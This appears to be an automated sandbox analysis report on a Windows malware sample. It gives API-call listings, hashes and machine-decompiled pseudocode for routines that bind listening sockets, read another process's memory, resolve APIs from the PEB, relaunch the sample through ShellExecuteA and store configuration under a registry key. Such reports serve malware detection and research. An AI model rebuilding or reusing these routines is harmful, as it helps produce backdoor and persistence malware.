                                0x0220a15b
                                0x00000000
                                0x0220a15d
                                0x00000000
                                0x0220a15f
                                0x00000000
                                0x0220a161
                                0x00000000
                                0x0220a163

                                APIs
                                • Sleep.KERNELBASE(0001D4C0), ref: 02209EFE
                                • Sleep.KERNEL32(00001000), ref: 02209F0B
                                • LoadLibraryA.KERNEL32(022027C0), ref: 02209F4D
                                • GetProcAddress.KERNEL32(00000000,022027D0), ref: 02209F6A
                                • GetProcAddress.KERNEL32(00000000,022027E0), ref: 02209F8E
                                • GetProcAddress.KERNEL32(00000000,022027F0), ref: 02209FB2
                                • RtlExitUserThread.NTDLL(00000000), ref: 0220A14B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: AddressProc$Sleep$ExitLibraryLoadThreadUser
                                • String ID: C:\Windows\system32\drivers\rmhlrn.sys
                                • API String ID: 3711489173-28800365
                                • Opcode ID: d535357440adb7e5afb2813f3d11efe7f5c9a38140e88aa121d1dfa02a0608dc
                                • Instruction ID: 2ad3686285f13cb0ed4c1c4fd3fbb2dd086e2f652d24260137990f243adc4050
                                • Opcode Fuzzy Hash: d535357440adb7e5afb2813f3d11efe7f5c9a38140e88aa121d1dfa02a0608dc
                                • Instruction Fuzzy Hash: 74614975DA0304EFEB10EBE0FC8DF5A77B5A718701F404919E60A9A2C6DBB059E4CB51
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • htons.WS2_32(00000EE6), ref: 02207AE9
                                • socket.WS2_32(00000002,00000002,00000000), ref: 02207B06
                                • setsockopt.WS2_32(?,0000FFFF,00001002,00100000,?), ref: 02207B44
                                • bind.WS2_32(?,00000002,00000010), ref: 02207B5A
                                • closesocket.WS2_32(?), ref: 02207C31
                                • RtlExitUserThread.NTDLL(00000000), ref: 02207C39
                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: ExitThreadUserbindclosesockethtonssetsockoptsocket
                                • String ID:
                                • API String ID: 3895830221-0
                                • Opcode ID: 2d4c4e1d37665bcd668eeac4a5ba17c4a63a26a3e5b1f890253439accd46286d
                                • Instruction ID: 776dcd171821afbde32926e95cf4a5d4e38d0d8754e3a87f0b5d32c22b2be345
                                • Opcode Fuzzy Hash: 2d4c4e1d37665bcd668eeac4a5ba17c4a63a26a3e5b1f890253439accd46286d
                                • Instruction Fuzzy Hash: AF511970E50398EBEB249FA4CC49BDAB7B4BF08740F0045D9E289AA2C4D7F45AC48F54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • socket.WS2_32(00000002,00000001,00000006), ref: 022083EA
                                • htons.WS2_32(00000ED3), ref: 0220840B
                                • bind.WS2_32(000000FF,00000002,00000010), ref: 0220842C
                                • closesocket.WS2_32(00000000), ref: 022084A3
                                • RtlExitUserThread.NTDLL(00000000), ref: 022084AB
                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: ExitThreadUserbindclosesockethtonssocket
                                • String ID:
                                • API String ID: 3582385377-0
                                • Opcode ID: 993b4b3a3e11346eaa04f5d708e120e0b712afdcf897db9ac1bd623833f3a766
                                • Instruction ID: 2b35964875225d5c56fffd823e27867d923904d1cf2e07098f9bef188ef58195
                                • Opcode Fuzzy Hash: 993b4b3a3e11346eaa04f5d708e120e0b712afdcf897db9ac1bd623833f3a766
                                • Instruction Fuzzy Hash: 73315074E60309EBDB20DFF49C49BAFBAB4BF04700F104619A606AA1C5D7B44A50CB92
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E00401346(void* _a4, void* _a8) {
                                				long _v8;
                                				void _v12;
                                				struct _LDT_ENTRY _v20;
                                				intOrPtr _v28;
                                				void _v44;
                                				struct _CONTEXT _v760;
                                				intOrPtr _v1224;
                                				void _v1232;
                                				void* _v4044;
                                				void _v4092;
                                				void* _t49;
                                				intOrPtr _t55;
                                
                                				_v760.ContextFlags = 0x10017;
                                				GetThreadContext(_a8,  &_v760); // executed
                                				GetThreadSelectorEntry(_a8, _v760.SegFs,  &_v20);
                                				_t49 = _a4;
                                				ReadProcessMemory(_t49, (_v20.BaseMid & 0x000000ff) << 0x00000010 | _v20.BaseMid & 0xff000000 | _v20.BaseLow & 0x0000ffff,  &_v4092, 0xb2c,  &_v8); // executed
                                				ReadProcessMemory(_t49, _v4044,  &_v1232, 0x1d8,  &_v8); // executed
                                				_t55 = _v1224;
                                				ReadProcessMemory(_t49, _t55 + 0x3c,  &_v12, "true",  &_v8); // executed
                                				_t23 = _t55 + 0x18; // 0x59000000
                                				ReadProcessMemory(_t49, _v12 + _t23,  &_v44, 0x18,  &_v8); // executed
                                				return _v28 + _t55;
                                			}















                                0x00401359
                                0x00401366
                                0x00401379
                                0x00401382
                                0x004013b5
                                0x004013ce
                                0x004013d0
                                0x004013e5
                                0x004013f4
                                0x004013fa
                                0x00401405

                                APIs
                                • GetThreadContext.KERNELBASE(00401252,?,766DF560,766DF500,765F7050), ref: 00401366
                                • GetThreadSelectorEntry.KERNEL32 ref: 00401379
                                • ReadProcessMemory.KERNELBASE(004017DA,00401252,?,00000B2C,00000000), ref: 004013B5
                                • ReadProcessMemory.KERNELBASE(004017DA,?,?,000001D8,00000000), ref: 004013CE
                                • ReadProcessMemory.KERNELBASE(004017DA,?,004017DA,?,00000000), ref: 004013E5
                                • ReadProcessMemory.KERNELBASE(004017DA,59000000,?,00000018,00000000), ref: 004013FA
                                Memory Dump Source
                                • Source File: 00000000.00000002.314281545.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.314272065.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.314297689.0000000000402000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.314331044.0000000000425000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.314403919.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.314484210.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.314601354.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Similarity
                                • API ID: MemoryProcessRead$Thread$ContextEntrySelector
                                • String ID:
                                • API String ID: 2927937389-0
                                • Opcode ID: cc59c708fe6d56a024a7654490b93e11f8ec0de07c3e6b0a674b95a7b8557adb
                                • Instruction ID: 4c816a06d37d702bd32cf5e2019a19290309f903cb74dd37cfec48fec69cc10a
                                • Opcode Fuzzy Hash: cc59c708fe6d56a024a7654490b93e11f8ec0de07c3e6b0a674b95a7b8557adb
                                • Instruction Fuzzy Hash: 8A21EFB294011EBFDB50DB94DD85EEE77BCEB48304F0000B2B605E2151D674EB499F60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 85%
                                			E0042651B() {
                                				void* _t57;
                                				void* _t66;
                                				struct HINSTANCE__* _t76;
                                				_Unknown_base(*)()* _t77;
                                				void* _t82;
                                				intOrPtr _t94;
                                				short* _t97;
                                				void* _t111;
                                				void* _t114;
                                				void* _t117;
                                				void* _t118;
                                				void* _t119;
                                
                                				_pop(_t117);
                                				_t57 = _t117;
                                				_t118 = _t117 - 0x401005;
                                				_t1 = _t118 + 0x402773; // 0x12c01
                                				if( *_t1 == 0) {
                                					 *((intOrPtr*)(_t118 + 0x40144d)) = 0x22222222;
                                					 *((intOrPtr*)(_t118 + 0x40143a)) = 0x33333333;
                                					L11:
                                					_t19 = _t118 + 0x401682; // 0x426b98
                                					 *((intOrPtr*)(_t118 + 0x401422)) = E00426776(LoadLibraryExA(_t19, 0, 0));
                                					_t22 = _t118 + 0x401451; // 0x426967
                                					E0042677B(_t22);
                                					SetErrorMode(0x8002);
                                					_t25 = _t118 + 0x401660; // 0x426b76
                                					CreateFileMappingA(0xffffffffffffffff, 0, "true", 0, 0x8000, _t25);
                                					_t27 = _t118 + 0x40164c; // 0x426b62
                                					_t66 = CreateFileMappingA(0xffffffff, 0, "true", 0, 0x15400, _t27);
                                					if(_t66 != 0) {
                                						_t82 = MapViewOfFile(_t66, 6, 0, 0, 0x15400);
                                						if(_t82 != 0) {
                                							 *(_t118 + 0x40168f) = _t82;
                                							if( *((char*)(_t118 + 0x402773)) == 1) {
                                								_t32 = _t118 + E00401000; // 0x426516
                                								_t114 = _t32;
                                								_t111 = _t82;
                                								if( *_t111 !=  *_t114) {
                                									memcpy(_t111, _t114, 0xe8ec);
                                								}
                                							}
                                						}
                                					}
                                					_t33 = _t118 + 0x401693; // 0x426ba9
                                					 *(_t118 + 0x401693) = _t118;
                                					CreateThread(0, 0, _t118 + 0x4016d1,  *(_t118 + 0x401693), 0, _t33);
                                					L17:
                                					while( *((char*)(_t118 + 0x402773)) == 0) {
                                						 *((intOrPtr*)(_t118 + 0x401503))(0xffffffff);
                                					}
                                					Sleep(0xc);
                                					if( *((intOrPtr*)(_t118 + 0x4016c9)) != 1) {
                                						goto L17;
                                					}
                                					L20:
                                					if( *((intOrPtr*)(_t118 + 0x402774)) != 1) {
                                						goto __eax;
                                					}
                                					_t43 = _t118 + 0x402778; // 0x427c8e
                                					if(GetModuleFileNameA(0, _t43, 0x1fe) == 0) {
                                						L24:
                                						Sleep(0x927c0);
                                						L25:
                                						ExitProcess(0);
                                					}
                                					 *((char*)(_t118 + 0x40277b)) = 0;
                                					_t46 = _t118 + 0x401627; // 0x426b3d
                                					_t76 = LoadLibraryExA(_t46, 0, 0);
                                					_t48 = _t118 + 0x401633; // 0x426b49
                                					_t77 = GetProcAddress(_t76, _t48);
                                					if(_t77 == 0) {
                                						goto L24;
                                					}
                                					_t50 = _t118 + 0x402778; // 0x427c8e
                                					_t51 = _t118 + 0x401426; // 0x42693c
                                					 *_t77(0, _t51, _t50, 0, 0, 1);
                                					_t52 = _t118 + 0x401679; // 0x426b8f
                                					_push(CreateMutexA(0, 0, _t52));
                                					if(GetLastError() != 0) {
                                						goto L25;
                                					}
                                					goto L24;
                                				}
                                				_t119 = _t119 + 0x38;
                                				 *((intOrPtr*)(_t118 + 0x401254)) = _t57 - 0x24e9c;
                                				_t94 =  *[fs:0x30];
                                				if(_t94 < 0) {
                                					_t97 =  *((intOrPtr*)( *((intOrPtr*)(_t94 + 0x34)) + 0xb8));
                                					asm("clc");
                                				} else {
                                					_t97 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t94 + 0xc)) + 0x1c)))) + 8));
                                					asm("clc");
                                				}
                                				if( *_t97 == 0x5a4d) {
                                					if( *((intOrPtr*)(_t97 +  *((intOrPtr*)(_t97 + 0x3c)))) == 0x4550) {
                                						 *((intOrPtr*)(_t118 + 0x401422)) = _t97;
                                						_t13 = _t118 + 0x40143e; // 0x426954
                                						_t14 = _t118 + 0x401422; // 0x76670000
                                						_push( *_t14);
                                						 *((intOrPtr*)(_t118 + 0x40144d)) = E00426776(E0042679C());
                                						_t16 = _t118 + 0x40142b; // 0x426941
                                						_t17 = _t118 + 0x401422; // 0x76670000
                                						_push( *_t17);
                                						 *((intOrPtr*)(_t118 + 0x40143a)) = E00426776(E0042679C());
                                						goto L11;
                                					}
                                				} else {
                                				}
                                			}















                                0x0042651b
                                0x0042651c
                                0x0042651e
                                0x00426524
                                0x0042652c
                                0x00426541
                                0x0042654b
                                0x004265dc
                                0x004265dc
                                0x004265f2
                                0x004265f8
                                0x00426604
                                0x0042660e
                                0x00426614
                                0x00426628
                                0x0042662e
                                0x00426642
                                0x0042664a
                                0x00426658
                                0x00426660
                                0x00426662
                                0x0042666f
                                0x00426676
                                0x00426676
                                0x0042667c
                                0x00426682
                                0x00426684
                                0x00426684
                                0x00426682
                                0x0042666f
                                0x00426660
                                0x00426686
                                0x0042668f
                                0x004266a6
                                0x00000000
                                0x004266ac
                                0x004266b7
                                0x004266b7
                                0x004266c1
                                0x004266ce
                                0x00000000
                                0x00000000
                                0x004266d0
                                0x004266d7
                                0x0042676e
                                0x0042676e
                                0x004266dd
                                0x004266f3
                                0x00426756
                                0x0042675b
                                0x00426761
                                0x00426763
                                0x00426763
                                0x004266f8
                                0x004266ff
                                0x0042670a
                                0x00426710
                                0x00426718
                                0x00426720
                                0x00000000
                                0x00000000
                                0x00426728
                                0x0042672f
                                0x00426738
                                0x0042673a
                                0x0042674b
                                0x00426754
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00426754
                                0x0042652e
                                0x00426539
                                0x0042655c
                                0x00426564
                                0x0042657a
                                0x0042657d
                                0x00426566
                                0x0042656e
                                0x00426571
                                0x00426571
                                0x00426583
                                0x00426595
                                0x0042659c
                                0x004265a2
                                0x004265a9
                                0x004265a9
                                0x004265b9
                                0x004265bf
                                0x004265c6
                                0x004265c6
                                0x004265d6
                                0x00000000
                                0x004265d6
                                0x00000000
                                0x00426585

                                APIs
                                • LoadLibraryExA.KERNELBASE(KERNEL32.DLL,00000000,00000000), ref: 004265E7
                                • SetErrorMode.KERNELBASE(00008002), ref: 0042660E
                                • CreateFileMappingA.KERNEL32(-00000001,00000000,?,00000000,00008000,hh8geqpHJTkdns6), ref: 00426628
                                • CreateFileMappingA.KERNEL32(000000FF,00000000,?,00000000,00015400,purity_control_7728), ref: 00426642
                                • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00015400), ref: 00426658
                                • CreateThread.KERNELBASE(00000000,00000000,?,?,00000000,00426BA9), ref: 004266A6
                                • Sleep.KERNELBASE(0000000C), ref: 004266C1
                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\lzxbD4wR0g.exe,000001FE), ref: 004266EB
                                • LoadLibraryExA.KERNELBASE(SHELL32.DLL,00000000,00000000), ref: 0042670A
                                • GetProcAddress.KERNELBASE(00000000,ShellExecuteA), ref: 00426718
                                • CreateMutexA.KERNEL32(00000000,00000000,Ap1mutx7), ref: 00426745
                                • GetLastError.KERNEL32(00000000), ref: 0042674C
                                • Sleep.KERNEL32(000927C0), ref: 0042675B
                                • ExitProcess.KERNEL32(00000000), ref: 00426763
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.314403919.0000000000426000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.314272065.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.314281545.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.314297689.0000000000402000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.314331044.0000000000425000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.314484210.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.314601354.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Similarity
                                • API ID: CreateFile$ErrorLibraryLoadMappingSleep$AddressExitLastModeModuleMutexNameProcProcessThreadView
                                • String ID: """"$3333$Ap1mutx7$C:\Users\user\Desktop\lzxbD4wR0g.exe$GetProcAddress$KERNEL32.DLL$LoadLibraryExA$SHELL32.DLL$ShellExecuteA$hh8geqpHJTkdns6$open$purity_control_7728
                                • API String ID: 3272623439-3246453834
                                • Opcode ID: f676b91d6f5bcdad043ce509a88fb4f08ac28c6dd2276d8f12aaaf4d281c529c
                                • Instruction ID: dcfc858b468905c563a0609d5445f4e97a5d5d3e1c5c710939930d5b66abe59d
                                • Opcode Fuzzy Hash: f676b91d6f5bcdad043ce509a88fb4f08ac28c6dd2276d8f12aaaf4d281c529c
                                • Instruction Fuzzy Hash: 9561BD30340298EBEF10DF60DD49FAA3768AF44705F950516FE09BE2F0D6B5AA448B1E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 66%
                                			E02204D96(void* __ecx, void* __eflags, int* _a4) {
                                				int _v8;
                                				intOrPtr _v20;
                                				intOrPtr _v28;
                                				void _v291;
                                				char _v292;
                                				char _v548;
                                				char _v1572;
                                				char _v1576;
                                				char _v1578;
                                				char _v1579;
                                				void _v1580;
                                				void* _v1584;
                                				void _v5679;
                                				char _v5680;
                                				int _v5684;
                                				signed int _v5688;
                                				void* _v5692;
                                				char _v5696;
                                				void* _v5700;
                                				signed int _v5704;
                                				signed int _v5708;
                                				void* _t175;
                                				void* _t201;
                                				void* _t202;
                                				signed int _t210;
                                				signed int _t220;
                                				signed int _t266;
                                				signed int _t289;
                                				void* _t295;
                                				void* _t309;
                                				intOrPtr _t310;
                                				intOrPtr _t311;
                                				void* _t314;
                                				void* _t315;
                                				void* _t321;
                                
                                				_push(0xffffffff);
                                				_push(0x2203fa8);
                                				_push(0x2218090);
                                				 *[fs:0x0] = _t310;
                                				_t311 = _t310 - 8;
                                				E02218060(0x1630, __ecx,  *[fs:0x0]);
                                				_v28 = _t311;
                                				_v292 = 0;
                                				memset( &_v291, 0, 0x41 << 2);
                                				_v5680 = 0;
                                				memset( &_v5679, 0, 0x3ff << 2);
                                				asm("stosw");
                                				asm("stosb");
                                				_v5688 = 0x80;
                                				_v5696 = 0;
                                				_v5684 = 0;
                                				_v5692 = 0;
                                				_v1584 = 0;
                                				_t175 = memset( &_v1580, 0, 0x142 << 2);
                                				_t314 = _t311 + 0x24;
                                				if(_a4 != 0) {
                                					_v8 = 0;
                                					 *0x21e1148( &_v292, "Software\\Tebjlp");
                                					_t266 = "alfoC:\\Windows\\"; // 0x6f666c61
                                					wsprintfA(_t309 +  *0x21e114c( &_v292, "\%d", _t266 * 0) - 0x120);
                                					_t315 = _t314 + 0xc;
                                					_t175 = RegOpenKeyExA(0x80000001,  &_v292, 0, 0xf003f,  &_v5692); // executed
                                					__eflags = _t175;
                                					if(_t175 == 0) {
                                						_v5688 = 1;
                                						while(1) {
                                							__eflags = _v5688 - 8;
                                							if(_v5688 >= 8) {
                                								break;
                                							}
                                							_t220 = "alfoC:\\Windows\\"; // 0x6f666c61
                                							wsprintfA( &_v292, 0x2203c54, _t220 * _v5688);
                                							_t315 = _t315 + 0xc;
                                							__eflags = _v5688 - 5;
                                							if(_v5688 > 5) {
                                								_v5684 = 0x400;
                                								_v5680 = 0;
                                								_t175 = RegQueryValueExA(_v5692,  &_v292, 0, 0,  &_v5680,  &_v5684);
                                								__eflags = _t175;
                                								if(_t175 == 0) {
                                									goto L37;
                                								} else {
                                									goto L5;
                                								}
                                							} else {
                                								_v5684 = 4;
                                								_t175 = RegQueryValueExA(_v5692,  &_v292, 0, 0,  &_v5696,  &_v5684);
                                								__eflags = _t175;
                                								if(_t175 == 0) {
                                									L37:
                                									_v5708 = _v5688;
                                									_v5708 = _v5708 - 1;
                                									__eflags = _v5708 - 6;
                                									if(_v5708 <= 6) {
                                										_t175 = _v5708;
                                										switch( *((intOrPtr*)(_t175 * 4 +  &M02205486))) {
                                											case 0:
                                												_v1584 = _v5696;
                                												goto L46;
                                											case 1:
                                												_v1580 = _v5696;
                                												goto L46;
                                											case 2:
                                												_v1579 = _v5696;
                                												goto L46;
                                											case 3:
                                												_v1578 = _v5696;
                                												goto L46;
                                											case 4:
                                												_v1576 = _v5696;
                                												goto L46;
                                											case 5:
                                												__eax =  &_v1572;
                                												__ecx = _v5684;
                                												__eax = E022049F9(_v5684,  &_v5680, _v5684,  &_v1572);
                                												goto L46;
                                											case 6:
                                												__eax =  &_v548;
                                												__ecx = _v5684;
                                												__eax = E022049F9(_v5684,  &_v5680, _v5684,  &_v548);
                                												goto L46;
                                										}
                                									}
                                									L46:
                                									_t295 = _v5688 + 1;
                                									__eflags = _t295;
                                									_v5688 = _t295;
                                									continue;
                                								} else {
                                									goto L5;
                                								}
                                							}
                                							goto L54;
                                						}
                                						__eflags = _v1584;
                                						if(_v1584 == 0) {
                                							L51:
                                							__eflags = _v5692;
                                							if(_v5692 != 0) {
                                								_t175 = RegCloseKey(_v5692);
                                							}
                                							_v8 = 0xffffffff;
                                						} else {
                                							_v5688 = 0;
                                							E0221772B( &_v5680,  &_v548, 0x100);
                                							_v5688 = _v5688 + 0x100;
                                							E0221772B(_t309 + _v5688 - 0x162c,  &_v1584, "true");
                                							_v5688 = _v5688 + 4;
                                							 *((char*)(_t309 + _v5688 - 0x162c)) = _v1580;
                                							_v5688 = _v5688 + 1;
                                							 *((char*)(_t309 + _v5688 - 0x162c)) = _v1579;
                                							_v5688 = _v5688 + 1;
                                							E0221772B(_t309 + _v5688 - 0x162c,  &_v1578, 2);
                                							_v5688 = _v5688 + 1;
                                							_v5688 = _v5688 + 1;
                                							E0221772B(_t309 + _v5688 - 0x162c,  &_v1576, "true");
                                							_v5688 = _v5688 + 4;
                                							E0221772B(_t309 + _v5688 - 0x162c,  &_v1572, _v1576);
                                							_v5688 = _v5688 + _v1576;
                                							_t201 = E02206330(_t309 + _v5688 - 0x162c, __eflags,  &_v5680, 0);
                                							_t315 = _t315 + 0x44;
                                							__eflags = _t201;
                                							if(_t201 == 0) {
                                								goto L5;
                                							} else {
                                								_t175 = E0221772B(0x2287da0,  &_v1584, 0x50c);
                                								goto L51;
                                							}
                                						}
                                					} else {
                                						_t175 = RegCreateKeyA(0x80000001,  &_v292,  &_v5692); // executed
                                						__eflags = _t175;
                                						if(_t175 == 0) {
                                							L5:
                                							_t202 = GlobalAlloc(0x40, 0x10400); // executed
                                							_v5700 = _t202;
                                							_t175 = E0220C89A(_v5700); // executed
                                							_t321 = _t315 + 4;
                                							__eflags = _t175;
                                							if(_t175 != 0) {
                                								__eflags = _v5700 + 0x30ec;
                                								_t175 = E02206330(_v5700 + 0x30ec, _v5700 + 0x30ec, _v5700 + 0x30ec, 0); // executed
                                								_t321 = _t321 + 8;
                                							}
                                							__eflags =  *0x2287da0;
                                							if( *0x2287da0 == 0) {
                                								_v5688 = 1;
                                								while(1) {
                                									__eflags = _v5688 - 8;
                                									if(_v5688 >= 8) {
                                										break;
                                									}
                                									_t210 = "alfoC:\\Windows\\"; // 0x6f666c61
                                									wsprintfA( &_v292, 0x2203c50, _t210 * _v5688);
                                									_t321 = _t321 + 0xc;
                                									_v5704 = _v5688;
                                									_v5704 = _v5704 - 1;
                                									__eflags = _v5704 - 6;
                                									if(__eflags <= 0) {
                                										switch( *((intOrPtr*)(_v5704 * 4 +  &M0220546A))) {
                                											case 0:
                                												_v5696 = 1;
                                												goto L20;
                                											case 1:
                                												_v5696 = 0;
                                												goto L20;
                                											case 2:
                                												_v5696 = 0;
                                												goto L20;
                                											case 3:
                                												_v5696 = 0x1e;
                                												goto L20;
                                											case 4:
                                												_v5696 = 0x8f;
                                												goto L20;
                                											case 5:
                                												_push(0x8e);
                                												_push(0x21e2244);
                                												__eax = E02204A5B(__ecx, __eflags);
                                												__esp = __esp + 8;
                                												_push(__eax);
                                												_push( &_v5680);
                                												__eax =  *0x21e1148();
                                												goto L20;
                                											case 6:
                                												_push(0x81);
                                												_push(0x21e21c0);
                                												__eax = E02204A5B(__ecx, __eflags);
                                												__esp = __esp + 8;
                                												_push(__eax);
                                												__eax =  &_v5680;
                                												_push( &_v5680);
                                												__eax =  *0x21e1148();
                                												goto L20;
                                										}
                                									}
                                									L20:
                                									__eflags = _v5688 - 5;
                                									if(_v5688 > 5) {
                                										RegSetValueExA(_v5692,  &_v292, 0, 1,  &_v5680,  *0x21e114c( &_v5680));
                                									} else {
                                										RegSetValueExA(_v5692,  &_v292, 0, "true",  &_v5696, "true");
                                									}
                                									_t289 = _v5688 + 1;
                                									__eflags = _t289;
                                									_v5688 = _t289;
                                								}
                                								RegCloseKey(_v5692);
                                								 *_a4 = 1;
                                								_a4[1] = 0;
                                								_a4[1] = 0;
                                								_a4[1] = 0x1e;
                                								_a4[2] = 0x8f;
                                								E0221772B( &(_a4[3]), 0x21e2244, 0x8f);
                                								__eflags =  &(_a4[0x103]);
                                								_t175 = E0221772B( &(_a4[0x103]), 0x21e21c0, 0x82);
                                							}
                                							__eflags = _v5700;
                                							if(_v5700 != 0) {
                                								_t175 = GlobalFree(_v5700);
                                							}
                                							_v8 = 0xffffffff;
                                						} else {
                                							_v8 = 0xffffffff;
                                						}
                                					}
                                				} else {
                                				}
                                				L54:
                                				 *[fs:0x0] = _v20;
                                				return _t175;
                                			}






































                                0x02204d99
                                0x02204d9b
                                0x02204da0
                                0x02204dac
                                0x02204db3
                                0x02204dbb
                                0x02204dc3
                                0x02204dc6
                                0x02204dda
                                0x02204ddc
                                0x02204df0
                                0x02204df2
                                0x02204df4
                                0x02204df5
                                0x02204dff
                                0x02204e09
                                0x02204e13
                                0x02204e1d
                                0x02204e34
                                0x02204e34
                                0x02204e3a
                                0x02204e41
                                0x02204e54
                                0x02204e62
                                0x02204e86
                                0x02204e8c
                                0x02204ea9
                                0x02204eaf
                                0x02204eb1
                                0x02205112
                                0x0220512d
                                0x0220512d
                                0x02205134
                                0x00000000
                                0x00000000
                                0x0220513a
                                0x02205153
                                0x02205159
                                0x0220515c
                                0x02205163
                                0x022051a0
                                0x022051aa
                                0x022051d1
                                0x022051d7
                                0x022051d9
                                0x00000000
                                0x022051db
                                0x00000000
                                0x022051db
                                0x02205165
                                0x02205165
                                0x0220518f
                                0x02205195
                                0x02205197
                                0x022051e0
                                0x022051e6
                                0x022051f5
                                0x022051fb
                                0x02205202
                                0x02205208
                                0x0220520e
                                0x00000000
                                0x0220521b
                                0x00000000
                                0x00000000
                                0x02205229
                                0x00000000
                                0x00000000
                                0x02205237
                                0x00000000
                                0x00000000
                                0x02205246
                                0x00000000
                                0x00000000
                                0x02205255
                                0x00000000
                                0x00000000
                                0x0220525d
                                0x02205264
                                0x02205272
                                0x00000000
                                0x00000000
                                0x0220527c
                                0x02205283
                                0x02205291
                                0x00000000
                                0x00000000
                                0x0220520e
                                0x02205299
                                0x02205124
                                0x02205124
                                0x02205127
                                0x00000000
                                0x02205199
                                0x00000000
                                0x02205199
                                0x02205197
                                0x00000000
                                0x02205163
                                0x0220529e
                                0x022052a5
                                0x0220542a
                                0x0220542a
                                0x02205431
                                0x0220543a
                                0x0220543a
                                0x02205440
                                0x022052ab
                                0x022052ab
                                0x022052c8
                                0x022052dc
                                0x022052f9
                                0x0220530a
                                0x0220531c
                                0x0220532c
                                0x0220533e
                                0x0220534e
                                0x0220536b
                                0x0220537c
                                0x0220538b
                                0x022053a8
                                0x022053b9
                                0x022053db
                                0x022053ef
                                0x022053fe
                                0x02205403
                                0x02205406
                                0x02205408
                                0x00000000
                                0x0220540a
                                0x0220541b
                                0x00000000
                                0x02205420
                                0x02205408
                                0x02204eb7
                                0x02204eca
                                0x02204ed0
                                0x02204ed2
                                0x02204ee0
                                0x02204ee7
                                0x02204eed
                                0x02204efa
                                0x02204eff
                                0x02204f02
                                0x02204f04
                                0x02204f0e
                                0x02204f15
                                0x02204f1a
                                0x02204f1a
                                0x02204f1d
                                0x02204f24
                                0x02204f2a
                                0x02204f45
                                0x02204f45
                                0x02204f4c
                                0x00000000
                                0x00000000
                                0x02204f52
                                0x02204f6b
                                0x02204f71
                                0x02204f7a
                                0x02204f89
                                0x02204f8f
                                0x02204f96
                                0x02204fa2
                                0x00000000
                                0x02204fa9
                                0x00000000
                                0x00000000
                                0x02204fb5
                                0x00000000
                                0x00000000
                                0x02204fc1
                                0x00000000
                                0x00000000
                                0x02204fcd
                                0x00000000
                                0x00000000
                                0x02204fd9
                                0x00000000
                                0x00000000
                                0x02204fe5
                                0x02204fea
                                0x02204fef
                                0x02204ff4
                                0x02204ff7
                                0x02204ffe
                                0x02204fff
                                0x00000000
                                0x00000000
                                0x02205007
                                0x0220500c
                                0x02205011
                                0x02205016
                                0x02205019
                                0x0220501a
                                0x02205020
                                0x02205021
                                0x00000000
                                0x00000000
                                0x02204fa2
                                0x02205027
                                0x02205027
                                0x0220502e
                                0x0220507a
                                0x02205030
                                0x0220504b
                                0x0220504b
                                0x02204f3c
                                0x02204f3c
                                0x02204f3f
